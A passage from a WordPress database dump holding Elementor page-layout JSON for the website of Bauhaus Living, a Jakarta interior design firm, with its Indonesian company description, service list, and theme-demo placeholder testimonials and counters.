":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3650,4842,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3651,4842,'_elementor_pro_version','3.8.1'),(3652,4843,'_wp_page_template','elementor_header_footer'),(3653,4843,'_elementor_edit_mode','builder'),(3654,4843,'_elementor_template_type','wp-page'),(3655,4843,'_elementor_version','3.8.1'),(3656,4843,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas 